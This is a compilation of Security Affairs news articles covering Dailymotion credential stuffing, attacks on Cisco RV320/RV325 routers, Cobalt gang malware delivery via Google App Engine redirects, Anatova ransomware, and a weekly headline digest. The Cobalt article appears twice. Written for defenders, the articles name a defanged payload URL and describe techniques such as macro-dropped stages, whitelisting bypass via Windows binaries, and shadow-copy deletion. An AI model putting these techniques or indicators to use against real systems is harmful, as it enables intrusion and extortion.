On Friday, the popular video sharing website Dailymotion announced that some accounts were hit by hackers. The company discovered unauthorized access attempts resulting from credential stuffing activity. The company blocked the attempts of intrusions and notified them to potentially affect users.

“Dailymotion announces being subject to a large-scale computer attack aimed at compromising the data of its users.” reads the press release published by the firm.

“The attack, which was discovered by Dailymotion technical teams and is still ongoing, was successfully contained following the implementation of measures to limit its scope. Potentially impacted users have been contacted directly by dailymotion to inform them and provide them with personalized support.”

The attempts were observed on January 19 and lasted for at least seven days, the company also notified of the attack to the CNIL (French Data Protection Authority).

After the discovery of hacking attempts, the French firm logged users out and forced a password reset procedure by including in the notification a link to change the password and re-gain access to the account.

Dailymotion

The company has also informed the French Data Protection Authority (CNIL) of the attack, as required by the European Union General Data Protection Regulation (GDPR).

Dailymotion reported that attackers were trying attempting to take over the accounts via brute force attacks or by using stolen credentials obtained from third-party data breaches.

“The attack consists in “guessing” the passwords of some dailymotion accounts by automatically trying a large number of combinations, or by using passwords that have been previously stolen from web sites unrelated to dailymotion.” continues the company.

The security team announced that it is working to improve the protection of its user data.

Unfortunately, it is quite easy to find huge archives available for sale on the Dark Web and use data they contain to carry out credential stuffing attacks.

Recently the popular cyber security expert Troy Hunt revealed the discovery of Collection #1 archive containing 773 million credentials, the huge dump was offered for just $45.

To prevent credential stuffing attacks, users have to choose a unique password for every online service they use and enable two-factor authentication for the account if possible.

In 2016, Dailymotion suffered a massive data breach that exposed 87 million accounts.

Pierluigi Paganini


Dailymotin (SecurityAffairs – hacking, credential stuffing attacks)

The post Dailymotion forces password reset in response to credential stuffing Attack appeared first on Security Affairs.

Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online

Cisco released security updates to address security flaws in several products including Small Business RV320/RV325 routers and hackers are already targeting them.

The tech giant addressed two serious issues in Cisco’s Small Business RV320 and RV325 routers. The first one could be exploited by a remote and unauthenticated attacker with admin privileges. to obtain sensitive information (CVE-2019-1653), while the second one can be exploited for command injection (CVE-2019-1652).

Now, news of the day is that hackers are targeting Cisco RV320/RV325 routers using new exploits.

After the disclosure of proof-of-exploit code for security flaws in
Cisco RV320 and RV325 routers, hackers started scanning the Internet for vulnerable devices in an attempt to take compromise them.

Cisco this week announced updates for router models RV320 and RV325 that fix a command injection (CVE-2019-1652) and an information disclosure (CVE-2019-1653) vulnerability; both of them are in the routers’ web management interface.

Chaining the two flaws it is possible to take over the Cisco RV320 and RV325 routers, the hackers exploit the bugs to obtain hashed passwords for a privileged account and run arbitrary commands as root.

Both vulnerabilities were reported by experts at RedTeam Pentesting firm, the proof-of-code exploit for the flaws was published by the experts after Cisco released the security update to address the flaws.

The experts published a proof-of-concept (PoC) exploit code for the command injection issue, the info disclosure flaw, and the data leak vulnerability.

Other PoC exploits were published by the security researcher David Davidson, who successfully tested them on Cisco RV320 routers.

Searching on Shodan for vulnerable Cisco RV320 and RV325 routers it is possible to find tens of thousands of devices online.

The popular expert Troy Mursch, chief research officer at Bad Packets, searched for vulnerable systems using the BinaryEdge search engine and found 9,657 devices exposed online (6,247 Cisco RV320 routers and 3,410, are Cisco RV325 routers).

Mursch created an interactive map that shows the geographic distribution of vulnerable routers, the vast majority of them are located in the US.

Cisco Cisco RV320/RV325 routers

“Due to the sensitive nature of these vulnerabilities, the IP addresses of the affected Cisco RV320/RV325 routers will not be published publicly.” reads a blog post published by Mursch on Badpackets.

“However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with Cisco PSIRT and US-CERT for further investigation and remediation,”

Pierluigi Paganini

(SecurityAffairs – Cisco RV320/RV325 routers, IoT)

[adrotate banner=”5″] [adrotate banner=”13″]

The post Hackers are targeting Cisco RV320/RV325, over 9K routers exposed online appeared first on Security Affairs.

Security Affairs: Cobalt cybercrime gang abused Google App Engine in recent attacks

The Cobalt cybercrime gang has been using Google App Engine to distribute malware through PDF decoy documents.

The Cobalt hacking group has been using Google App Engine to distribute malware through PDF decoy documents. The group targeted more than 20 other government and financial institutions worldwide. 

Cobalt crime gang is a Russian hacking crew that has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

In August, security experts from Netscout’s ASERT uncovered a campaign carried out by the group that targeted the NS Bank in Russia and Carpatica/Patria in Romania.

Recently that hacking crew leveraged URL redirection in PDF decoy documents to deliver malicious payloads to the victims. Threat actors used HTTPS URLs to point to Google App Engine, with this technique attackers attempt to trick the victim into believing they are accessing a resource from Google.

cobalt

Attackers used specially crafted PDF documents created with the
Adobe Acrobat 18.0 that contained the malicious URLs in a compressed form.

“Most of the PDF’s we observed were created using Adobe Acrobat 18.0. They contained the malicious URL in a compressed form in the PDF stream using Flat Decode (Filter/FlateDecode).” reads the analysis published by Netskope.

“Similarly, all the decoys used HTTPS URLs for delivering the payload.”

This specific URL redirection case is classified as Unvalidated Redirects and Forwards as per the Open Web Application Security Project (OWASP).

“Once the URL is accessed, the user is logged out from appengine.google.com and a response status code ‘302’ is generated for URL redirection. As this action gets executed, the user is in turn redirected to google.com/url using the query “?continue=”.  Using this redirection logic, the destination landing page is reached,” continues the analysis. 

PDF readers prompt a security warning when the document connects to a website, but once “remember this action for this site” is checked for a domain, this warning will not be displayed. The possible scenarios are two:

  • the prompt refers the appengine.google.com, but victims will likely allow it to reach the website. 
  • the appengine.google.com is whitelisted by administrators for legitimate reasons, the prompt will not be displayed.. 

Cobalt crime group used PDFs that downloaded a Microsoft Word document with obfuscated macro code. Once the victims will enable the macro another stage payload is downloaded. 

“On enabling the option, the macro gets executed and downloads another stage payload from transef[.]biz/fr.txt. The stage payloads are often used by threat actors to ensure a smoother transition and to make an attack harder to detect, investigate and mitigate” continues the analysis.

“fr.txt is detonated using Microsoft Connection Manager Profile Installer (csmtp.exe) from the location, %Appdata%\Roaming\Microsoft\26117.txt as an INF file”

The attack technique resembles the Squiblydoo method wherein malicious scriptlets are loaded using native Windows applications, it allows to bypass application whitelisting solutions like Windows Applocker.

At the time of analysis, the next stage payload “fr.txt” was down and not serving any payload. Though the payload was down, we leveraged our Netskope Threat Intelligence to attribute these attacks to an infamous threat actor group named ‘Cobalt Strike’, ” concludes the analysis.

Pierluigi Paganini

(SecurityAffairs – Cobalt, Google App Engine)


The post Cobalt cybercrime gang abused Google App Engine in recent attacks appeared first on Security Affairs.



Security Affairs

Cobalt cybercrime gang abused Google App Engine in recent attacks

The Cobalt cybercrime gang has been using Google App Engine to distribute malware through PDF decoy documents.

The Cobalt hacking group has been using Google App Engine to distribute malware through PDF decoy documents. The group targeted more than 20 other government and financial institutions worldwide. 

Cobalt crime gang is a Russian hacking crew that has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

In August, security experts from Netscout’s ASERT uncovered a campaign carried out by the group that targeted the NS Bank in Russia and Carpatica/Patria in Romania.

Recently that hacking crew leveraged URL redirection in PDF decoy documents to deliver malicious payloads to the victims. Threat actors used HTTPS URLs to point to Google App Engine, with this technique attackers attempt to trick the victim into believing they are accessing a resource from Google.

cobalt

Attackers used specially crafted PDF documents created with the
Adobe Acrobat 18.0 that contained the malicious URLs in a compressed form.

“Most of the PDF’s we observed were created using Adobe Acrobat 18.0. They contained the malicious URL in a compressed form in the PDF stream using Flat Decode (Filter/FlateDecode).” reads the analysis published by Netskope.

“Similarly, all the decoys used HTTPS URLs for delivering the payload.”

This specific URL redirection case is classified as Unvalidated Redirects and Forwards as per the Open Web Application Security Project (OWASP).

“Once the URL is accessed, the user is logged out from appengine.google.com and a response status code ‘302’ is generated for URL redirection. As this action gets executed, the user is in turn redirected to google.com/url using the query “?continue=”.  Using this redirection logic, the destination landing page is reached,” continues the analysis. 

PDF readers prompt a security warning when the document connects to a website, but once “remember this action for this site” is checked for a domain, this warning will not be displayed. The possible scenarios are two:

  • the prompt refers the appengine.google.com, but victims will likely allow it to reach the website. 
  • the appengine.google.com is whitelisted by administrators for legitimate reasons, the prompt will not be displayed.. 

Cobalt crime group used PDFs that downloaded a Microsoft Word document with obfuscated macro code. Once the victims will enable the macro another stage payload is downloaded. 

“On enabling the option, the macro gets executed and downloads another stage payload from transef[.]biz/fr.txt. The stage payloads are often used by threat actors to ensure a smoother transition and to make an attack harder to detect, investigate and mitigate” continues the analysis.

“fr.txt is detonated using Microsoft Connection Manager Profile Installer (csmtp.exe) from the location, %Appdata%\Roaming\Microsoft\26117.txt as an INF file”

The attack technique resembles the Squiblydoo method wherein malicious scriptlets are loaded using native Windows applications, it allows to bypass application whitelisting solutions like Windows Applocker.

At the time of analysis, the next stage payload “fr.txt” was down and not serving any payload. Though the payload was down, we leveraged our Netskope Threat Intelligence to attribute these attacks to an infamous threat actor group named ‘Cobalt Strike’, ” concludes the analysis.

Pierluigi Paganini

(SecurityAffairs – Cobalt, Google App Engine)


The post Cobalt cybercrime gang abused Google App Engine in recent attacks appeared first on Security Affairs.

Security Affairs newsletter Round 198 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Collection #1 Data Breach Analysis – Part 1
DarkHydrus adds Google Drive support to its RogueRobin Trojan
Russian hacker Alexander Zhukov extradited by Bulgaria to US
A flaw in MySQL could allow rogue servers to steal files from clients
Iranian developer advertised BlackRouter RaaS
Omron addressed multiple flaws in its CX-Supervisor product
Unpatched Cisco critical flaw CVE-2018-15439 exposes small Business Networks to hack
Adobe fixed XSS flaws in Experience Manager that can result in information Disclosure
Critical flaw in Linux APT package manager could allow remote hack
Did you win at online casinos? Watch out, your data might have had exposed online
France watchdog fines Google with $57 million under the EU GDPR
0patch releases unofficial security patches for 3 Windows flaws yet to be fixed
Hacker threatened a family using a Nest Camera to broadcast a fake missile attack alert
PHP PEAR official site hacked, tainted package manager distributed for 6 months
URLhaus identified and shut down 100,000 malware sites in 10 Months
Cisco addresses flaws in its products, including Small Business routers and Webex
DHS issues emergency Directive to prevent DNS hijacking attacks
Expert shares PoC exploit code for remote iOS 12 jailbreak On iPhone X
Kaspersky links GreyEnergy and Zebrocy activities
New Russian Language Malspam is delivering Redaman Banking Malware
Microsoft Exchange zero-day and exploit could allow anyone to be an admin
The Story of Manuels Java RAT.
Two distinct campaigns are spread GandCrab ransomware and Ursnif Trojan via weaponized docs
Two distinct campaigns spread GandCrab ransomware and Ursnif Trojan via weaponized docs
Anatova ransomware – Expert believe it will be a dangerous threat
Collection #1 Data Breach Analysis – Part 2
Local privilege escalation bug fixed in CheckPoint ZoneAlarm
Upcoming Ukraine elections in the crosshairs of hackers

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 198 – News of the week appeared first on Security Affairs.

Anatova ransomware – Expert believe it will be a dangerous threat

Security experts at McAfee have discovered a new malware, dubbed Anatova ransomware, that has been spotted infecting computers worldwide

The name Anatova is based on a name in the ransom note that is dropped on the infected systems.

The Anatova ransomware outstands for its obfuscation capabilities and ability to infect network shares, it has a modular structure that allows adding new functions to the malware.

“During our continuous hunt for new threats, we discovered a new ransomware family we call Anatova (based on the name of the ransom note). Anatova was discovered in a private peer-to-peer (p2p) network.” reads the analysis published by McAfee.

Malware experts from McAfee discovered the Anatova ransomware on a private peer-to-peer network.
Anatova uses the icon of a game or application to trick victims into download and execute it.

The malware uses a manifest to request admin rights, it implements multiple efficient protection techniques against static analysis, it makes a few checks to avoid running in a sandbox.

The malware demands $700 in ransom to decrypt the data.

The largest number of infections was observed in the United States, followed by Germany, Belgium, France, and the UK. It is interesting to note that the malware doesn’t infect systems from a list of the countries that includes all CIS countries, Syria, Egypt, Morocco, Iraq, and India.

Anatova ransomware

“It’s quite normal to see the CIS countries being excluded from execution and often an indicator that the authors might be originating from one of these countries.” continues the experts. “In this case it was surprising to see the other countries being mentioned. We do not have a clear hypothesis on why these countries in particular are excluded.”

The ransomware looks for files that are smaller than 1 MB and avoid encrypting files of the operating system. Anatova also checks for network shares, this is particularly dangerous in large organizations because a single infection can cause severe problems to several systems in the company network.

Each Anatova sample uses its own key, this implies that there’s no master key available that could be used to decrypt all victims files.

After encrypting the files, the ransomware will clean the memory of the key, IV, and private RSA key values, to prevent anyone dumping this information from memory and use it to decrypt files.

“When all this is done, Anatova will destroy the Volume Shadow copies 10 times in very quick succession. Like most ransomware families, it is using the vssadmin program, which required admin rights, to run and delete the volume shadow copies.” states McAfee.

According to McAfee, the Anatova ransomware was developed by skilled vxers, the researchers believe it is a prototype being tested and has the potential to become a serious threat.

Additional details, including IoCs. are reported in the analysis published by McAfee.

Pierluigi Paganini

(SecurityAffairs – Anatova ransomware, cybercrime)

The post Anatova ransomware – Expert believe it will be a dangerous threat appeared first on Security Affairs.